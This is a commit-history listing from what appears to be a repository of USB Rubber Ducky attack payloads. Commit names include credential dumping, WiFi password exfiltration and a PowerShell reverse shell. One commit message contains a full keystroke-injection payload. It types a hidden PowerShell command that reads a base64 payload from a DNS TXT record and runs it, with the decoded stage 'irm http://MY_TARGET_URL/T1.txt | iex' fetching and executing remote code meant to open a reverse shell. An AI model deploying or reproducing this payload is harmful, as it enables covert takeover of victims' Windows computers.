Commit Graph

1386 Commits (master)

Author SHA1 Message Date
Nate b4978b7b47
Update DNS-TXT-CommandInection.txt 2024-08-03 23:37:33 -05:00
Nate 1db132c3ac
Update README.md 2024-08-03 23:36:21 -05:00
Nate 902412339b
Update DNS-TXT-CommandInection.txt 2024-08-03 23:35:02 -05:00
Nate 7a36e6324a
Update powershellReverseShellOne-liner.ps1 2024-08-03 23:33:41 -05:00
Nate dad3d550fe
Create DNS-TXT-CommandInection.txt
REM     Title: DNS-TXT-CommandInection
REM     Author: Nate
REM     Description: A usb rubber ducky payload that leverages DNS TXT records to perform command injection.
REM     Windows Powershell is the CLI used by the payload. Replace the DNS TXT record for your domain with
REM     the base64 encoded payload you have. See README.md for more details on converting your payload to base64
REM 	and an example of creating your DNS TXT record in AWS Route53 service.
REM     Target: Windows 10, 11
REM     Props: Hak5, Darren Kitchen, Korben
REM     Version: 1.0
REM     Category: Execution

REM     CONFIGURATION
REM     REQUIRED A domain with the ability to manipulate the DNS TXT records.
REM     REQUIRED Web Server hosting the payload. In this example, python3 http.server was used to host a 
REM     reverseshell.
REM     REQUIRED - Provide URL used for Example
DEFINE  #MY_TARGET_URL example.com
REM     Example: powershell /w 1 $a=(resolve-dnsname MY_TARGET_URL TXT).strings;powershell -e $a
REM     Example of Decoded payload: "irm http://MY_TARGET_URL/T1.txt | iex"

REM     NOTES: No base64 can be used as an alternative by replacing "$a=",";powershell -e $a" with just "|iex"
REM     for the STRING payload below. Examples of the decoded command and encoded command are shown below to put 
REM     into DNS TXT record.
REM     Decoded: "irm http://MY_TARGET_URL/T1.txt | iex"
REM     Encoded: "aQByAG0AIABoAHQAdABwADoALwAvAGUAeABhAG0AcABsAGUALgBjAG8AbQAvAFQAMQAuAHQAeAB0ACAAfAAgAGkAZQB4AA=="

REM     ShoutOut: powershell reverse shell one-liner by Nikhil SamratAshok Mittal @samratashok. See link below.
REM     https://gist.github.com/egre55/c058744a4240af6515eb32b2d33fbed3
REM     The link below has the Powershell script to convert your payloads to Base64.
REM     https://	

DELAY 1000 
GUI r
DELAY 1000
STRING powershell /w 1 $a=(resolve-dnsname MY_TARGET_URL TXT).strings;powershell -e $a
DELAY 500
ENTER
2024-08-03 23:32:09 -05:00
Nate 571e2e6e33
Create T1.txt 2024-08-03 23:30:46 -05:00
Nate 3578034173
Create powershellReverseShellOne-liner.ps1 2024-08-03 23:30:02 -05:00
Nate b31e55d14a
Create convertBase64.ps1 2024-08-03 23:29:01 -05:00
Nate 784e37b063
Create README.md 2024-08-03 23:27:09 -05:00
Nate 460c95f5df
Update .gitignore 2024-08-03 21:19:44 -05:00
Nate b1999a0e7e
Create .gitignore
.gitignore as a placeholder
2024-08-03 21:17:34 -05:00
Peaks 3b30121b9e
Merge pull request #467 from nic005-arch/master
DUCKY-Harvest
2024-07-24 16:21:42 -04:00
Nicolo’ c5fe32cf05
Update payload.txt 2024-07-24 22:12:43 +02:00
Nicolo’ 8754d6eab4
Update sy_cred.ps1 2024-07-24 21:23:43 +02:00
Nicolo’ 791133a14e
Update README.md 2024-07-24 21:23:04 +02:00
Nicolo’ dc4ccd1874
Update README.md 2024-07-24 21:22:14 +02:00
Nicolo’ 7972203c71
Update README.md 2024-07-24 21:18:14 +02:00
Nicolo’ 10b6ea2f0e
Update sy_cred.ps1 2024-07-24 21:15:49 +02:00
Nicolo’ 3dc6750316
Update payload.txt 2024-07-24 21:14:16 +02:00
Nicolo’ fcc1caf610
Update sy_cred.ps1 2024-07-24 19:58:46 +02:00
Nicolo’ 5f7db5486a
Delete cred-dump/sysa2.ps1 2024-07-24 19:52:22 +02:00
Nicolo’ d68bf2967f
Update payload.txt 2024-07-24 19:52:11 +02:00
Nicolo’ c231b242cb
Create sy_cred.ps1 2024-07-24 19:51:53 +02:00
Nicolo’ 74e1bf5bf3
Delete cred-dump/paylode.txt 2024-07-24 19:50:41 +02:00
Nicolo’ ab486b9b9f
Create payload.txt 2024-07-24 19:50:19 +02:00
Nicolo’ 4f1ae9c312
Create README.md 2024-07-24 19:47:41 +02:00
Nicolo’ f8587e6006
Delete cred-dump/README.md 2024-07-24 19:44:02 +02:00
Nicolo’ 87f6b3d780
Update README.md 2024-07-24 16:23:07 +02:00
Nicolo’ 4f92998fb9
Update README.md 2024-07-24 16:22:34 +02:00
Nicolo’ b92530bfca
Update README.md 2024-07-24 14:28:02 +02:00
Nicolo’ f84b6730e3
Update sysa2.ps1 2024-07-24 14:25:51 +02:00
Nicolo’ c57972728f
Create README.md 2024-07-24 14:25:16 +02:00
Nicolo’ b3f8d984b1
Update sysa2.ps1 2024-07-24 14:21:40 +02:00
Nicolo’ 8833b95983
Add files via upload 2024-07-24 14:19:45 +02:00
Nicolo’ 61ac533024
Create paylode.txt 2024-07-24 14:19:07 +02:00
Peaks 30de5c0260
Merge pull request #465 from F1ll0ry/master
WiFi-Passwords-Exfiltration-Via-SCP
2024-07-23 03:14:22 -04:00
zb0r 6bce38ad77 Renamed directory from WiFi-Passwords-Exfiltration to WiFi-Passwords-Exfiltration-Via-SCP 2024-07-22 09:01:08 +00:00
Peaks e17abcfa02
Merge pull request #464 from PlumpyTurkey/master
Updates extensions and payloads
2024-07-21 21:16:19 -04:00
zb0r 023c46c15a
Fixed a typo in the extension 2024-07-19 01:40:38 +03:00
zb0r 152f89c78d
fixed the extension 2024-07-19 01:34:58 +03:00
Peaks c79209168a
Update payload.txt
Fixing my mistake of wrong extension.
2024-07-18 16:56:45 -04:00
Peaks 6a33d49db1
Update payload.txt
Fixing Extension call. content was missing.
2024-07-18 16:54:34 -04:00
zb0r cd3d4e7e42
Create README.md 2024-07-18 12:05:14 +03:00
zb0r 25b879d4ff
Create Payload.txt 2024-07-18 12:04:12 +03:00
Robert Naame 17b28cd2ee Moved WiFi-Passwords-Exfiltration files to exfiltration directory 2024-07-18 11:51:12 +03:00
zb0r 50812cddfa
Updated a typo 2024-07-18 11:35:55 +03:00
zb0r 114209b817
Create README.md 2024-07-18 10:59:30 +03:00
zb0r c174b59c50
Create payload.txt 2024-07-18 10:56:11 +03:00
PlumpyTurkey da3191f6f2 Updates version badge 2024-07-12 16:51:33 +02:00
PlumpyTurkey 3e5ca780e6 Updates extensions 2024-07-12 16:46:13 +02:00